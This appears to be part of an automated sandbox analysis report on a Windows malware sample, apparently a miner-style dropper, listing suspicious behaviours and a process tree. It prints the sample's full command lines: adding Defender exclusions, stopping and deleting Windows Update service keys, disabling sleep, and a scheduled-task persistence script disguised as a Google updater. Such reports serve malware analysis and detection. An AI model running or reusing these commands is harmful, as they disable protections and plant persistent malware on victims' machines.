Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: Explorer.EXE
pid | process
3212 | Explorer.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, powershell.EXE, dllhost.exe, powershell.EXE, svchost.exe, powershell.exe
pid | process (consecutive repeats collapsed, count in parentheses)
408 | powershell.exe (x2)
3624 | powershell.exe (x2)
3084 | powershell.exe (x2)
1688 | powershell.EXE (x3)
3720 | dllhost.exe (x4)
2824 | powershell.EXE (x2)
3720 | dllhost.exe (x12)
3264 | svchost.exe (x4)
3720 | dllhost.exe (x6)
4448 | powershell.exe (x1)
3720 | dllhost.exe (x10)
4448 | powershell.exe (x2)
3720 | dllhost.exe (x10)
4448 | powershell.exe (x1)
3720 | dllhost.exe (x3)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
3212 | Explorer.EXE
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
672 |
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, powershell.exe, powercfg.exe, powercfg.exe, powercfg.exe, powercfg.exe
description | pid | process
Token: SeDebugPrivilege | 408 | powershell.exe
Token: SeDebugPrivilege | 3624 | powershell.exe
Token: SeShutdownPrivilege | 4020 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4020 | powercfg.exe
Token: SeShutdownPrivilege | 4120 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4120 | powercfg.exe
Token: SeShutdownPrivilege | 1660 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1660 | powercfg.exe
Token: SeShutdownPrivilege | 4124 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4124 | powercfg.exe
Token: SeIncreaseQuotaPrivilege | 3624 | powershell.exe
Token: SeSecurityPrivilege | 3624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3624 | powershell.exe
Token: SeLoadDriverPrivilege | 3624 | powershell.exe
Token: SeSystemProfilePrivilege | 3624 | powershell.exe
Token: SeSystemtimePrivilege | 3624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3624 | powershell.exe
Token: SeCreatePagefilePrivilege | 3624 | powershell.exe
Token: SeBackupPrivilege | 3624 | powershell.exe
Token: SeRestorePrivilege | 3624 | powershell.exe
Token: SeShutdownPrivilege | 3624 | powershell.exe
Token: SeDebugPrivilege | 3624 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3624 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3624 | powershell.exe
Token: SeUndockPrivilege | 3624 | powershell.exe
Token: SeManageVolumePrivilege | 3624 | powershell.exe
Token: 33 | 3624 | powershell.exe
Token: 34 | 3624 | powershell.exe
Token: 35 | 3624 | powershell.exe
Token: 36 | 3624 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3624 | powershell.exe
Token: SeSecurityPrivilege | 3624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3624 | powershell.exe
Token: SeLoadDriverPrivilege | 3624 | powershell.exe
Token: SeSystemProfilePrivilege | 3624 | powershell.exe
Token: SeSystemtimePrivilege | 3624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3624 | powershell.exe
Token: SeCreatePagefilePrivilege | 3624 | powershell.exe
Token: SeBackupPrivilege | 3624 | powershell.exe
Token: SeRestorePrivilege | 3624 | powershell.exe
Token: SeShutdownPrivilege | 3624 | powershell.exe
Token: SeDebugPrivilege | 3624 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3624 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3624 | powershell.exe
Token: SeUndockPrivilege | 3624 | powershell.exe
Token: SeManageVolumePrivilege | 3624 | powershell.exe
Token: 33 | 3624 | powershell.exe
Token: 34 | 3624 | powershell.exe
Token: 35 | 3624 | powershell.exe
Token: 36 | 3624 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3624 | powershell.exe
Token: SeSecurityPrivilege | 3624 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3624 | powershell.exe
Token: SeLoadDriverPrivilege | 3624 | powershell.exe
Token: SeSystemProfilePrivilege | 3624 | powershell.exe
Token: SeSystemtimePrivilege | 3624 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3624 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3624 | powershell.exe
Token: SeCreatePagefilePrivilege | 3624 | powershell.exe
Token: SeBackupPrivilege | 3624 | powershell.exe
Token: SeRestorePrivilege | 3624 | powershell.exe
Token: SeShutdownPrivilege | 3624 | powershell.exe
-
Suspicious use of FindShellTrayWindow 6 IoCs
Processes: Explorer.EXE
pid | process (consecutive repeats collapsed, count in parentheses)
3212 | Explorer.EXE (x6)
-
Suspicious use of SendNotifyMessage 36 IoCs
Processes: Explorer.EXE
pid | process (consecutive repeats collapsed, count in parentheses)
3212 | Explorer.EXE (x36)
-
Suspicious use of SetWindowsHookEx 27 IoCs
Processes: Explorer.EXE, dmi1dfg7n.exe, Conhost.exe, Conhost.exe, Conhost.exe
pid | process (consecutive repeats collapsed, count in parentheses)
3212 | Explorer.EXE (x15)
4408 | dmi1dfg7n.exe (x1)
4676 | Conhost.exe (x1)
3212 | Explorer.EXE (x6)
4448 | Conhost.exe (x1)
1864 | Conhost.exe (x1)
3212 | Explorer.EXE (x2)
-
Suspicious use of UnmapMainImage 3 IoCs
Processes: RuntimeBroker.exe, RuntimeBroker.exe, Explorer.EXE
pid | process
3704 | RuntimeBroker.exe
5100 | RuntimeBroker.exe
3212 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: dmi1dfg7n.exe, cmd.exe, cmd.exe, powershell.exe, powershell.EXE, dllhost.exe, lsass.exe, updater.exe
description | pid | process | target process
PID 4980 wrote to memory of 408 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 4980 wrote to memory of 408 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 4980 wrote to memory of 4944 | 4980 | dmi1dfg7n.exe | cmd.exe
PID 4980 wrote to memory of 4944 | 4980 | dmi1dfg7n.exe | cmd.exe
PID 4980 wrote to memory of 384 | 4980 | dmi1dfg7n.exe | cmd.exe
PID 4980 wrote to memory of 384 | 4980 | dmi1dfg7n.exe | cmd.exe
PID 4980 wrote to memory of 3624 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 4980 wrote to memory of 3624 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 4944 wrote to memory of 1504 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 1504 | 4944 | cmd.exe | sc.exe
PID 384 wrote to memory of 4020 | 384 | cmd.exe | powercfg.exe
PID 384 wrote to memory of 4020 | 384 | cmd.exe | powercfg.exe
PID 4944 wrote to memory of 3696 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 3696 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 3016 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 3016 | 4944 | cmd.exe | sc.exe
PID 384 wrote to memory of 4120 | 384 | cmd.exe | powercfg.exe
PID 384 wrote to memory of 4120 | 384 | cmd.exe | powercfg.exe
PID 4944 wrote to memory of 2624 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 2624 | 4944 | cmd.exe | sc.exe
PID 384 wrote to memory of 1660 | 384 | cmd.exe | powercfg.exe
PID 384 wrote to memory of 1660 | 384 | cmd.exe | powercfg.exe
PID 4944 wrote to memory of 2560 | 4944 | cmd.exe | sc.exe
PID 4944 wrote to memory of 2560 | 4944 | cmd.exe | sc.exe
PID 384 wrote to memory of 4124 | 384 | cmd.exe | powercfg.exe
PID 384 wrote to memory of 4124 | 384 | cmd.exe | powercfg.exe
PID 4944 wrote to memory of 396 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 396 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 1368 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 1368 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 2808 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 2808 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 4348 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 4348 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 4764 | 4944 | cmd.exe | reg.exe
PID 4944 wrote to memory of 4764 | 4944 | cmd.exe | reg.exe
PID 4980 wrote to memory of 2892 | 4980 | dmi1dfg7n.exe | dialer.exe
PID 4980 wrote to memory of 2892 | 4980 | dmi1dfg7n.exe | dialer.exe
PID 4980 wrote to memory of 2892 | 4980 | dmi1dfg7n.exe | dialer.exe
PID 4980 wrote to memory of 3084 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 4980 wrote to memory of 3084 | 4980 | dmi1dfg7n.exe | powershell.exe
PID 3084 wrote to memory of 2620 | 3084 | powershell.exe | schtasks.exe
PID 3084 wrote to memory of 2620 | 3084 | powershell.exe | schtasks.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 1688 wrote to memory of 3720 | 1688 | powershell.EXE | dllhost.exe
PID 3720 wrote to memory of 624 | 3720 | dllhost.exe | winlogon.exe
PID 3720 wrote to memory of 692 | 3720 | dllhost.exe | lsass.exe
PID 3720 wrote to memory of 968 | 3720 | dllhost.exe | svchost.exe
PID 3720 wrote to memory of 60 | 3720 | dllhost.exe | dwm.exe
PID 692 wrote to memory of 2176 | 692 | lsass.exe | sysmon.exe
PID 852 wrote to memory of 4448 | 852 | updater.exe | powershell.exe
PID 852 wrote to memory of 4448 | 852 | updater.exe | powershell.exe
PID 3720 wrote to memory of 452 | 3720 | dllhost.exe | svchost.exe
PID 692 wrote to memory of 2176 | 692 | lsass.exe | sysmon.exe
PID 3720 wrote to memory of 716 | 3720 | dllhost.exe | svchost.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exe  (depth 1)
  command line: C:\Windows\system32\lsass.exe
  - Suspicious use of WriteProcessMemory
C:\Windows\system32\winlogon.exe  (depth 1)
  command line: winlogon.exe
  C:\Windows\system32\dwm.exe  (depth 2)
    command line: "dwm.exe"
  C:\Windows\System32\dllhost.exe  (depth 2)
    command line: C:\Windows\System32\dllhost.exe /Processid:{f5c002a6-b068-4104-8131-fedd7f47f8ee}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\dllhost.exe  (depth 2)
    command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{f49f8606-5d2a-4cce-950f-c5747e47e15c}
  C:\Windows\System32\dllhost.exe  (depth 2)
    command line: C:\Windows\System32\dllhost.exe /Processid:{96bbd1b9-7297-4d8a-9e47-1944eeb835a8}
  C:\Windows\SysWOW64\dllhost.exe  (depth 2)
    command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{4ee13b5f-6667-46bf-8b2c-2b3bccf92d7d}
  C:\Windows\System32\dllhost.exe  (depth 2)
    command line: C:\Windows\System32\dllhost.exe /Processid:{abfb3ee6-7747-4b30-97ae-75f6692e32ab}
  C:\Windows\SysWOW64\dllhost.exe  (depth 2)
    command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{552184cf-ce11-458a-a567-f75c73949ff8}
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\wbem\unsecapp.exe  (depth 1)
  command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\sysmon.exe  (depth 1)
  command line: C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe  (depth 1)
  command line: sihost.exe
  - Modifies registry class
C:\Windows\system32\taskhostw.exe  (depth 1)
  command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
C:\Windows\Explorer.EXE  (depth 1)
  command line: C:\Windows\Explorer.EXE
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of UnmapMainImage
  C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe  (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\dialer.exe  (depth 3)
      command line: C:\Windows\system32\dialer.exe
      - Drops file in Windows directory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\schtasks.exe  (depth 4)
        command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe  (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
        - Checks processor information in registry
        - Enumerates system info in registry
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        - Enumerates system info in registry
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Checks computer location settings
      - Checks system information in the registry
      - Enumerates system info in registry
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-dc 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\dialer.exe  (depth 3)
      command line: C:\Windows\system32\dialer.exe
      - Drops file in Windows directory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - Checks processor information in registry
      C:\Windows\system32\schtasks.exe  (depth 4)
        command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe  (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-dc 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SYSTEM32\cmd.exe  (depth 3)
      command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop wuauserv
        - Launches sc.exe
        C:\Windows\system32\WerFault.exe  (depth 5)
          command line: C:\Windows\system32\WerFault.exe -u -p 1688 -s 220
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop bits
        - Suspicious use of NtCreateProcessExOtherParentProcess
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
